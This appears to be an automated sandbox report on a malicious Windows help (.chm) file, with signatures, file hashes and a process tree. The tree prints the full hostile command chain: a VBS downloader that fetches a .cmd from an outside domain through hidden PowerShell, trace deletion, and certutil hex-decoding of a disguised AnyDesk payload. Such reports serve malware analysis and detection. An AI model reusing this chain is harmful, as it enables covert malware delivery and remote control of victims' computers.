Resubmissions

15/01/2025, 16:20

250115-ttetnazjfk 3

15/01/2025, 15:00

250115-sdde8awlfy 10

Analysis

  • max time kernel
    36s
  • max time network
    40s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    15/01/2025, 15:00

General

  • Target

    AVSL-004673321/AVSL-004673321.chm

  • Size

    75KB

  • MD5

    98ea3f95d115f45570febc7a1872b1a7

  • SHA1

    a0985ee5bba1ed9ea30a4422c4007d35efde92d2

  • SHA256

    94492a4bfc8998c413bd30023b60427b394e5950eed33373f07faaf863c1d3f3

  • SHA512

    cbd8258068e3d25a682d9402a68adf5b9f8fba7414545b86af1e801c705dca4c77b5df77696b867cddf20f803f4cb599f472d3e76202df2dd1e75471b15afd86

  • SSDEEP

    1536:4pVD2VwAO+rou4327/9AbCtkFLStN1osGQPGYQ+yV:uVgbO+rv79kCOUbKnQDQ+C

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 7 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\AVSL-004673321\AVSL-004673321.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2604
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
      2⤵
      • Hide Artifacts: Hidden Window
      • Suspicious use of WriteProcessMemory
      PID:3016
      • C:\Windows\system32\extrac32.exe
        extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
        3⤵
          PID:2264
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2520
          • C:\Users\Public\ript.exe
            "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://roboadtech.com/Raunch/AVSL-004673321.cmd C:\\Users\\Public\\df.cmd
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:2144
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1616
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Public\df.cmd" "
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1176
            • C:\Windows\system32\extrac32.exe
              extrac32.exe /C /Y "C:\\Windows\\System32\\wlrmdr.exe" "C:\\Users\\Public\\awpha.pif"
              5⤵
                PID:2916
              • C:\Windows\system32\extrac32.exe
                extrac32.exe /C /Y "C:\\Windows\\System32\\cmd.exe" "C:\\Users\\Public\\alpha.pif"
                5⤵
                  PID:1904
                • C:\Windows\system32\extrac32.exe
                  extrac32 /C /Y "C:\\Windows\\System32\\certutil.exe" "C:\\Users\\Public\\phf.pif"
                  5⤵
                    PID:1704
                  • C:\Users\Public\alpha.pif
                    C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Public\df.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1072
                    • C:\Users\Public\phf.pif
                      C:\\Users\\Public\\phf.pif -decodehex -F "C:\Users\Public\df.cmd" "C:\\Users\\Public\\AnyDesk.avi" 9
                      6⤵
                      • Executes dropped EXE
                      PID:1636
                  • C:\Users\Public\alpha.pif
                    C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1972
                    • C:\Users\Public\phf.pif
                      C:\\Users\\Public\\phf.pif -decodehex -F "C:\\Users\\Public\\AnyDesk.avi" "C:\\Users\\Public\\Libraries\\AnyDesk.pif" 12
                      6⤵
                      • Executes dropped EXE
                      PID:2252
                  • C:\Users\Public\awpha.pif
                    "C:\Users\Public\awpha.pif" -s 3600 -f 0 -t _ -m _ -a 11 -u C:\Users\Public\Libraries\AnyDesk.pif
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:2356
                  • C:\Windows\system32\PING.EXE
                    ping 127.0.0.1 -n 5
                    5⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:1956
              • C:\Windows\system32\taskkill.exe
                taskkill /F /IM hh.exe
                3⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2656

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

            Filesize

            7KB

            MD5

            e0466a312422e51d36a14f724bf97927

            SHA1

            ca26210c46eb3a8410b6bf87508b33329adbaec4

            SHA256

            64276bcf27d041cf32628c3b70c6a7634e4bd6593a1168d654873aedafd21bdb

            SHA512

            9360c99461fa31b5aeecbc65a1cd7cd884d7f29fa62d7206c36d7c035cd656911068577a613f6b889d225b9768b14e73ebc3da55adafb41f75754d40f41d362f

          • C:\Users\Public\AnyDesk.avi

            Filesize

            1.6MB

            MD5

            4b6b8688bffe5b3ce33d16f6fb02e0ec

            SHA1

            f287b2320d312ee1ec4ad30d251f837860b23699

            SHA256

            b8d9fedf4ee1a38007dbd30c7035e0051221689bcf24f1b309a20aea9a0022df

            SHA512

            9aedba5b7dadde70dc5bcd2063d9e6ccbf26f2137890c7ed2214b875bd000df85a54622fcaff1189d4fec04e3a9a705182ff79aa919e88f0193b0b3724b9aafe

          • C:\Users\Public\aloha.vbs

            Filesize

            194B

            MD5

            71efa4ec6c67fa5665b1d0c64d60fc25

            SHA1

            f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

            SHA256

            08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

            SHA512

            7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

          • C:\Users\Public\awpha.pif

            Filesize

            43KB

            MD5

            1b79536d9033da4ee3b8b21354dbd391

            SHA1

            09b4a38f0a6960768f26ef86a30bc0167e690f50

            SHA256

            385b4553cbef207d9c5e466002940c205d51b1e2095fa8b442de1f64d6512f95

            SHA512

            2475b0352929d87090d92d1d6b2cb3db97632d780bf898c1c44f9169d513752f1ef26df476f9eb8487e75cbdc5c5584e3a4470cfedcea709a39cd82a59c190ae

          • C:\Users\Public\df.cmd

            Filesize

            2.3MB

            MD5

            800b673badb63ad57e96324389a9f77b

            SHA1

            e72da9e4dbe7f584a449d434e63ad71a2d4b74d0

            SHA256

            60412b1b9b974a1309f7209def199a77e6d087f67d58018f26d035505f5cc7a6

            SHA512

            0a4c0fc2cf809f5a520d9484b519b960fedbfe379129a454db91b73dc97a30bb8f581644e7c3187a46e4333bf3c7d02db3baea8903fa66b8089da582233b5618

          • C:\Users\Public\phf.pif

            Filesize

            1.1MB

            MD5

            ec1fd3050dbc40ec7e87ab99c7ca0b03

            SHA1

            ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

            SHA256

            1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

            SHA512

            4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

          • C:\Users\Public\ript.exe

            Filesize

            152KB

            MD5

            791af7743252d0cd10a30d61e5bc1f8e

            SHA1

            70096a77e202cf9f30c064956f36d14bcbd8f7bb

            SHA256

            e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

            SHA512

            d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

          • \Users\Public\alpha.pif

            Filesize

            337KB

            MD5

            5746bd7e255dd6a8afa06f7c42c1ba41

            SHA1

            0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

            SHA256

            db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

            SHA512

            3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

          • memory/1616-53-0x000000001B270000-0x000000001B552000-memory.dmp

            Filesize

            2.9MB

          • memory/1616-54-0x00000000022A0000-0x00000000022A8000-memory.dmp

            Filesize

            32KB

          • memory/2520-13-0x000000001B3B0000-0x000000001B692000-memory.dmp

            Filesize

            2.9MB

          • memory/2520-14-0x00000000024E0000-0x00000000024E8000-memory.dmp

            Filesize

            32KB